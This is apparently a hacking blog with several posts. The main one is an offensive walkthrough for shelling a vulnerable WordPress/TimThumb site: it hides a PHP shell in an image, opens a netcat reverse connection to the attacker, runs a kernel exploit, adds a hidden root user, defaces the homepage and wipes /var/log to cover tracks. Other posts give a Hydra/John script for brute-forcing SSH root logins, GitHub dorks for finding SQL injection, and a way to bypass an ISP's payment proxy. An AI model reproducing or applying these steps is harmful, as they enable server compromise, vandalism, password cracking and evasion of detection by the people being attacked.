Venni, Viddi ,Vicci ....I hacked :P

Pentesting/hacking web apps

Find a Vulnerable Website –> Upload a c100/99 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks




ok so will do that ... but since this will be done on my pentest lab i wont be so thorough with the proxy/anonymity but in the video i will cover the basic to the upload shell




So we first find the vulnerable website/app

(duuh)

We run the web scanner to look for vulnerabilities (arachni web scanner, acunetix, w3af, vega ,also sqlmap works quite ok if you know what your doing p.s so the others)




my vulnerability finds an insecure upload form ... :)




OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php

The above vulnerability affects WordPress blogs/ ViArt web app that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.

-It is hosted on a Unix System.

Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.

Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.

Run the Program and follow the in-program instructions to build the ‘finalImage.php’.

To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.



iCon2PHP Terminal Output:

[...]

Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php

Entered!

Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)

Go to the vulnerability and type at the URL:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png

It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!



OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
 

Root the Server:

Now that you have shelled your website we can start the proccess to root the server.


What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…

Let’s procceed to rooting….

Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:


netcat

4. Now type:


-l -n -v -p 402

5.It should have an output like this:


listening on [any] 402 port

6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:


Host:YouIPAddress Port: 402 (or the port you forwarded….)

8. Hit connect and… Voila! Connected to the server!

Downloading and Executing the Kernel exploit:

1. Now, if you type:


whoami

you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploitshere….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:


– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)

(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))

– Change the permissions of the exploit:
chmod 777 exploit

5. Execute the exploit. Type:


./exploit

6. Root permissions acquired! Type this to ensure:


id

or


whoami

7. Add a new root user:


adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username

8. Change the password of the new root user:


passwd root1

SUCCESSFULLY ROOTED!

Deface the Website:


What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).

Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.

First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:


/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files

In short /var/log is the location where you should find all Linux logs file.

To delete all of them by once type:


su root1

rm -rf /var/log
mkdir /var/log




the video to this as an example under a virtual lab is here from my team :) ViArt Exploit

I hate downloading WordLists

1. Introduction

You most definetly know of THC Hydra ... well i love the tool problem is ...Hydra don’t digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before start the brute-force attack. And so, you are limited by your memory size plus i hate downloading the darn wordlists or dictionaries well why... takes to much time changes every now and then... and my internet speed sometimes sucks and the bundles lord the bundles.....so here is my tune up.... why dont we use two tools

HYDRA and John The Ripper

It’s OK with an usual password dictionary, but you could want more. Something like passwords list generated by “John the ripper” (John provides greats way to generate passwords: digit/alpha/special chars only, “rules” options, “external” filters, etc.)

Our goal is to use the output of John the ripper with Hydra.

The method is trivial but does the job.

loop

(1) Generate random passwords with John the Ripper in a file durring few seconds (file grow up very quickly).

Keep a john's session file.

(2) Run hydra with the passwords file.

(3) If found, exit. if not, continue the session created in (1).

end loop



2. The script

This is the bash script I wrote to perform the task.

· Review ‘hydra_*‘ variables (if need run ‘hydra –help’). See: ‘hydra_host‘, ‘hydra_port‘, ‘hydra_module‘, … and maybe ‘hydra_all_params‘.

· Review ‘john_*‘ variables. See: ‘john_all_params‘ and choose your template : (–incremental:All, –incremental:Digits , –incremental:Alpha , –single, –rules …) see john.conf file to get the list.

Enjoy!

Get hydra-john.sh

#!/bin/sh

hydra="/usr/local/bin/hydra"

john="/usr/bin/john"

hydra_module="ssh2"

hydra_host="127.0.0.1"

hydra_port="22"

hydra_nb_task="10"

hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"

john_all_params="--incremental:Alpha --stdout"

john_time_step=20 # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"

hydra_logfile="/tmp/hydralog"



if [ "$1" = "" ];then

echo "Usage: $0 <john session file>"

exit 0

fi



#for lfile in `ls $loginfiles*`;do



while [ 1 ];do

# generate some password with john the ripper

echo; echo "- Start (re)generating passwords with John"

if [ -e "$john_sessionfile.rec" ];then

# if session exist, restore it

$john --restore=$john_sessionfile > $tmp_passwd &

else

# if session not exist yet, create it

$john $john_all_params --session=$john_sessionfile > $tmp_passwd &

fi



# wait 100 seconds, then kill john and start hydra on it

echo "- Wait ..."

sleep $john_time_step

echo "- Kill john"

killall john 2>/dev/null 1>/dev/null

sleep 1



# start hydra

echo; echo "- Start hydra"; echo



rm -f $hydra_logfile

echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"

$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile



# if a valid pair has been found, stop the loop

if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then

echo; echo "FOUND !!"

grep $hydra_module $hydra_logfile | grep -v DATA

exit 0

fi


done



happy hunting ... oops learning .... p.s to check out this trick with a proxy(tor) check this site...am here fuu

Mac OSX and penetration Testing

I' am a MacBook/MacOSx user and i love pentesting ...problem is Mac doesnt have a Pentest enviroment unless i do a VM with my FreeBSD with tools.... aside from that i love custom tools so i also have custom tools either by my hand or from others....




Setting up a Pen-Testing environment on your Mac

Download and install Xcode
Open Xcode > Preferences > Download > Install Command line tools

Open Terminal:
> java
Install it.

Install Homebrew (fuck macports)
> ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"

Run BrewDoctor (may need to fix your .bash_profile $PATH
> brew doctor

Install nmap and nping
> brew install nmap
> brew install ruby
> brew install postgresql (if you prefer mysql: brew install mysql)

Startup PGSQL
> initdb /usr/local/var/postgres
> createuser msf -P -h localhost
> createdb -O msf msf -h localhost

Install Metasploit gems
> gem install pg sqlite3 msgpack hpricot

Setup VNC Viewer for MSF
> echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
> echo open vnc://\$1 >> /usr/local/bin/vncviewer
> chmod +x /usr/local/bin/vncviewer

Install Metasploit (from repository)
Select the directory to install metasploit (ex: ~/tools)
> git clone git://github.com/rapid7/metasploit-framework.git

Additional Tools:
brew install dsniff (Password Sniffer)
brew install ettercap (MitM made easy)
brew install aircrack (Wifi Suite)
brew install john (John the Ripper)
brew install hydra (Brute Force Cracker)
brew install ophcrack (Rainbow Table Cracker)
brew install skipfish (WebApp Scanner)

"tcpdump" and "netcat" are pre-installed with OSX (don't over look them )

Download and install BurpSuite free
http://www.portswigger.net/burp/download.html

Recon on GITHUB ? ----this ought-a be good

Assuming you have done a recon on a webapp/website and found that it uses a CMS or an ERP or a web app that is hosted on GITHUB.... here is a search phrase u might want to use

e.g

EXTENSION:{file extension e.g php} {function}

extension:php mysql_query $_GET

most of this apps will have a fault then you can quickly deduce what to do from then,,,,, ADAPTATION

UPDATE
Now we have a MySQL injection

extension:php mysql_query $_POST

MySQL and SQL Column Truncation Vulnerabilities

Developers :-) morning.... and hackers (we know u dint sleep so ...sup)

heard of MySQL and SQL Column Truncation Vulnerabilities?...No?

ok so ..... its when a simple misconfiguration happens when developers dont escape data size options in coding e.g
 
$submitted_data = null;
if (isPswdCorrect($uame, $pswd)) {
$submitted_data = getUserDataByLogin($uname);
...
}

this gives us/a hacker chance to create another admin/user with the same privillages as a known user but with a diff password...

that is if i login as :admin x: instead of :admin: it will still work with a diffrent password that i would have created as :admin x: (without the ::)
happy security information :P

P.S video coming up soon....

Tackling security and getting Free Internet* :)

I love emoticons ... its like me only in character... if you dint get that....
any who.... am in Kenya for now... and its quite tricky to get free* internet but not impossible... so here is a trick i used to get free internet via orange Kenya ISP.... a while back....boring sunday = free internet

but heres the catch after that escapade i ventured into looking for other alternative methods to get free internet and what do you know.... there are other methods...see on pre-paid modems you purchase bundles to be able to access the internet.. but for orange ke. its a different story simply connect your modem and connect... well its not like you wont be redirected to their annoying proxy every time you dont have bundles and/or credit toped up on you sim/ruim.... the good thing is theres a way around this... how... heres a way around it.

Proxies---- to be more specific i used TOR you can get it here tor download or whatever proxy you are best comfortable with... an easier way to also work this around is to do a simple goole search for free proxy servers... then use them ... here is one way to do that:

after that.... Just browse....the port settings should be as such.... 80 for http and 443 for https.

Meanwhile if ou wanna find out more about how this trick works wait for my second post an i will update thee :)

UPDATE-EDIT: For those really curious if it still works... NO ....why? IT OBVIOUSLY GOT PATCHED

UPDATE-EDIT: For those really curious it still works YES/NO yes on the EVDO/CDMA modem set to port 53(DNS) <---this is open on orange gateway problem is that it disconnects after 10 minutes
on the GSM.... Not yet accomplished.